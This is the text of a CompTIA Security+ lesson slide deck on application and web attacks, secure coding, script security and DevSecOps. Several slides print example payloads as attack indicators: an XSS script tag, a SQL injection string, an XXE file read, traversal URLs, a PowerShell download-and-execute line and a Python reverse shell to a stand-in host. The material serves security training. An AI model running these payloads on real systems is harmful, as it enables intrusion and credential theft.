reflection 3

profiletamerrabee3
sy0-601-14v1.0.pptx

Summarizing Secure Application Concepts

Lesson 14

1

Analyze Indicators of Application Attacks

Topic 14A

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

2

2

1.3 Given a scenario, analyze potential indicators associated with application attacks

Syllabus Objectives Covered

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

3

Application Attacks

Attacks that target vulnerabilities in application code or architecture/design

Privilege escalation

Get privileges from target vulnerable process to run arbitrary code

Remote execution when code is transferred from another machine

Vertical and horizontal privilege escalation

Detect by process logging and auditing plus automated detection scanning

Error handling

Identify attack from error messages

Leaking information through errors

Improper input handling

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

4

4

Overflow Vulnerabilities

Buffer overflow

Buffer is memory allocated to application

Overflows can allow arbitrary code to execute

Integer overflow

Cause application to calculate values that are out-of-bounds

Could use to cause crash or use in buffer overflow attack

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

5

Null Pointer Dereferencing and Race Conditions

Pointers are used in C/C++ to refer to memory locations

Dereferencing occurs when the program tries to read or write the location via the pointer

If the location is null or invalid, the process will crash

Race condition

Execution depends on timing and sequence of events

Time of check/time of use (TOCTTOU)

Environment is manipulated to change a resource after checking but before use

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

6

Memory Leaks and Resource Exhaustion

Memory leaks

Process allocates memory locations, but never releases them

Can cause host to run out of memory

Could be faulty code or could be malicious

Resource exhaustion

CPU time, system memory allocation, fixed disk capacity, and network utilization

Spawning activity to use up these resources

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

7

DLL Injection and Driver Manipulation

Dynamic Link Library (DLL) implements some function that multiple processes can use

DLL injection forces a process to load malicious DLL

Refactoring might allow code obfuscation to elude anti-virus

Shim

Exploit application compatibility framework to allow malware to persist on host

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

8

Pass the Hash Attack

Exploiting cached credentials to perform lateral movement

Windows hosts cache credentials in memory as NTLM hashes

Local malicious process with administrator privileges can dump these hashes

Malware executes another process on a remote host

Attacker can just pass hash without having to crack it

Remote host will accept hash as credential

Detection through security log events

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

9

Images © 123rf.com.

9

Indicators of Application Attacks

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

10

Review Activity

Assisted Lab

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

Identifying Application Attack Indicators

11

Lab Activity

Analyze Indicators of Web Application Attacks

Topic 14B

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

12

12

1.3 Given a scenario, analyze potential indicators associated with application attacks

Syllabus Objectives Covered

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

13

Uniform Resource Locator Analysis

Uniform Resource Locator (URL) format

HTTP methods

TCP connections

GET, POST, PUT, HEAD

POST or PUT

URL (query parameters)

Fragment/anchor ID

HTTP response codes

Percent encoding

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

14

14

Application Programming Interface Attacks

API calls and parameters

Must only be with HTTPS encryption

Common weaknesses and vulnerabilities

Ineffective secrets management

Lack of input validation

Error messages leaking information

Denial of service

https://webapp.foo/?Action=RunInstance&Id=123&Count=1& InstanceAccessKey=MyInstanceAccessKey&Placement=us-east&

MyAuthorizationToken

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

15

15

Replay Attacks

Resubmitting or guessing authorization tokens

Session management cookies

Replay cookie to obtain authenticated session

Secure cookies

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

16

16

Session Hijacking and Cross-site Request Forgery (1)

Cookie hijacking and session prediction

Client-side/cross-site (CSRF/XSRF) request forgery

Passes a URL to another site where the user has an authenticated session

Confused deputy

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

17

Images © 123rf.com.

Session Hijacking and Cross-site Request Forgery (2)

Clickjacking

Add invisible layer to intercept/redirect click events

SSL strip

Exploits redirect from HTTP to HTTPS

Sites should no longer be using plain HTTP

HTTP Strict Transport Security (HSTS)

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

18

Cross-Site Scripting (XSS)

Attacker injects code in trusted site that will be executed in client browser

Non-persistent/reflected

Coded in a link that the user must click

Persistent/stored XSS

Injected into a database the site uses to serve content

Client-side scripts

Document Object Model (DOM)

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

19

Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.

https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E

Structured Query Language Injection Attacks

Client-side versus server-side attacks

Injection-type attacks

Structured Query Language (SQL) statements

SELECT, INSERT, DELETE, UPDATE, WHERE

SQL injection

Pass SQL statements to the web application via user input or URL

Show or insert database records

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

20

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

Extensible Markup Language (XML) injection

XML tagged documents

XML External Entity (XXE) to exfiltrate data and files

Lightweight Directory Access Protocol (LDAP) injection

Query language to read and update network directories

XML and LDAP Injection Attacks

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar SYSTEM "file:///etc/config"> ]>

<bar>&bar;</bar>

(&(username=Bob)(&))

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

21

Directory Traversal and Command Injection Attacks

Directory traversal

Obtain access to files outside web site root directory

Canonicalization attack and percent encoding

Command injection

Cause server to run OS shell commands

http://victim.foo/?show=../../../../etc/config

http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

22

Server-side Request Forgery

Cause a server to make API calls or HTTP requests with arbitrary parameters

Weak authentication/access control between internal services

Weak input validation and faults in request parsing

Variety of exploit techniques and aims

Reconnaissance

Credential stealing

Unauthorized requests

Protocol smuggling

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

23

Images © 123rf.com.

Indicators of Web Application Attacks

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

24

Review Activity

Assisted Lab

Identifying a Browser Attack

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

25

Lab Activity

Summarize Secure Coding Practices

Topic 14C

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

26

26

2.3 Summarize secure application development, deployment, and automation concepts

3.2 Given a scenario, implement host or application security solutions

Syllabus Objectives Covered

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

27

Secure Coding Techniques

Security development life cycles and best practice guides

Open Web Application Security Project (OWASP)

Input validation

User-generated data typed/entered via form controls

Passed by another program (URL or HTTP header)

Document and test all types of user/API input

Normalization and output encoding

Strip illegal characters and substrings and use a predictable format and character set for the context in which the output is used

Check all data being passed as output

Differences between character sets and encoding methods

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

28

Server-side versus Client-side Validation

Client-side execution

Code is run by the browser

Document Object Model (DOM) scripting

Might send a request to the server, but the request is constructed by the client

Server-side execution

Code is run by the server

Client-side input validation

Code is not running in a fully trusted environment

Server-side input validation

Might require complex transactions, slowing down process

Both used together

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

29

Secure cookies

Avoid using persistent cookies for session authentication

Set the Secure attribute

Set the HttpOnly attribute

Use the SameSite attribute

Response headers

HTTP Strict Transport Security (HSTS)

Content Security Policy (CSP)

Cache-Control

Web Application Security

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

30

30

Data Exposure and Memory Management

Data exposure

Allowing privileged data to be read without authorization

Weak authentication/session management

Lack of encryption

Error handling

Structured exception handler (SEH)

Prevent use of error conditions for arbitrary code/injection

Prevent display of default messages

Memory management

Use of unsecure functions

Input validation and overflow protection

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

31

Secure Code Usage

Code reuse

Using a block of code in a different context

Third-party libraries/DLLs

Monitor shared libraries for known vulnerabilities and patches

Software development kit (SDK)

Sample code/libraries

Stored procedures

Pre-built functions for querying databases

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

32

Other Secure Coding Practices

Unreachable and dead code

Code that cannot be executed or does not affect program flow

Obfuscation/camouflage

Disguise nature of code

Inhibit reverse engineering

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

33

Static Code Analysis

Static/source code analysis

Submit code for analysis by automated software

Manual code review

Human analysis of source code

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

34

Dynamic Code Analysis

Run application in a staging environment for testing

Fuzzing and stress testing

Application UI

Protocol

File format

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

35

Screenshot Burp Suite portswigger.net/burp.

Secure Coding Practices

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

36

Review Activity

Implement Secure Script Environments

Topic 14D

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

37

37

1.4 Given a scenario, analyze potential indicators associated with network attacks

3.2 Given a scenario, implement host or application security solutions

4.1 Given a scenario, use the appropriate tool to assess organizational security

Syllabus Objectives Covered

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

38

Scripting

Automation of activity through programs and scripts

Basic elements of a script

Parameters

Branching and looping statements

Validation and error handlers

Unit tests

Scripting languages

Domain-specific languages

Orchestration tools

Syntax

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

39

39

Basic syntax elements

Case sensitivity and indentation

Variables

Assignment and typing

Functions

Declaring functions

Logic and looping statements

Comparison operators

Control blocks

Modules

Libraries of functions

Execution

Within interpreter or compiled

Python Script Environment

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

40

def fullname(name,surname):

   return name + " " + surname

#This ends the function definition

#The next line calls the function

greeting = 'Hello ' + fullname('World', '')

print(greeting)

40

PowerShell Script Environment

Cmdlets and functions

Verb-noun cmdlets

Return objects

Declaring functions

Logic and looping statements

Modules

function Cat-Name {

  param ($name,$surname)

  return $name + ' ' + $surname

}

#This ends the function declaration; the next statement calls it

$greeting = 'Hello ' + $(Cat-Name('World',''))

Write-Host $greeting

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

41

41

Prevent use of unauthorized code

Allow lists and block lists

Allow list control means that nothing can run if it is not on the approved list

Block list control means that anything not on the prohibited list can run

Code signing

OS-based Execution Control

Software Restriction Policies (SRP)

AppLocker

Windows Defender Application Control (WDAC)

SELinux

AppArmor

Execution Control

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

42

Malicious Code Indicators

Detection through monitoring platforms or host/process behavior analysis

Shellcode

Creates a process or injects a DLL

Credential dumping

Dumps credentials from lsass.exe

Lateral movement/insider attack

Remote execution

Persistence

Registry autorun keys

Services/scheduled tasks

Windows Management Instrumentation (WMI) event subscriptions

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

43

43

Exploit frameworks

Suspicious cmdlets

Creating processes or binaries

Downloading files

Bypassing execution policy

Using Windows API calls

Launching PowerShell from a different script type

PowerShell usage auditing

Execution control

Constrained language mode

Script tracing and logging

Prevent use of older versions

PowerShell Malicious Indicators

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

44

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'); Do-Evil -StealCreds"

[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\Temp\doevil.dll")

44

Bourne Again Shell (Bash)

Batch scripting for Linux command-line

Malicious indicators

Reconnaissance-type activity

Download tools

Crontab (task scheduler)

Account/firewall configuration changes

Web shells

Use of sockets to redirect terminal output to network port

File integrity scans with diff

Resource monitoring with top and free

Bash and Python Malicious Indicators

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

45

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("evil.foo",4444))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

pty.spawn("/bin/sh")'

Macros and Visual Basic for Applications (VBA)

Macros record steps taken in office productivity application

Macros are coded in a scripting language

Virtual Basic for Applications (VBA)

Office document macros

JavaScript

PDF document macros

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

46

46

Man-in-the-Browser Attack

Compromise browser

Inspect session data

Change browser settings

Perform redirection

Perform code injection

Malicious plug-in/script/DLL

Browser Exploitation Framework (BeEF)

Exploit kits

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

47

Screenshot: Browser Exploitation Framework (beefproject.com).

Secure Script Environments

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

48

Review Activity

Assisted Labs

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

Implementing PowerShell Security

Identifying Malicious Code

49

Lab Activity

Summarize Deployment and Automation Concepts

Topic 14E

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

50

50

2.3 Summarize secure application development, deployment, and automation concepts

Syllabus Objectives Covered

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

51

DevSecOps and requirements for greater automation

Completion of tasks without human intervention

Automation facilitates better scalability and elasticity

Scalability means that the costs involved in supplying the service to more users are linear

Elasticity refers to the system's ability to handle changes on demand in real time

Application Development, Deployment, and Automation

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

52

Secure Application Development Environments

Software development life cycle (SDLC)

Waterfall and Agile

Quality assurance (QA)

Development environments

Preserving environment integrity

Sandboxing

Secure baseline

Integrity measurement

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

53

Images © 123rf.com.

Provisioning, Deprovisioning, and Version Control

Provisioning is the process of deploying an application to the target environment

Installer/setup package

Instance (VM with OS and application)

Deprovisioning is the process of removing an application from packages or instances

Version control

Customer version ID

Developer build ID

Source code version control

Code commits and backups

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

54

Automation/Scripting Release Paradigms

Waterfall versus Agile SDLCs

Continuous integration

Commit updates often

Reduce commit conflicts

Continuous delivery

Push updates to staging infrastructure

Continuous deployment

Push updated code to production

Continuous monitoring and automated courses of action

Continuous validation

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

55

Images © 123rf.com.

Software Diversity

Runtime environment

Compiled code

Interpreted code

Software diversity as obfuscation

Security by diversity

Avoid monocultures to make attacks harder to develop

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

56

Deployment and Automation Concepts

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

57

Review Activity

Summary

Lesson 14

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

58

58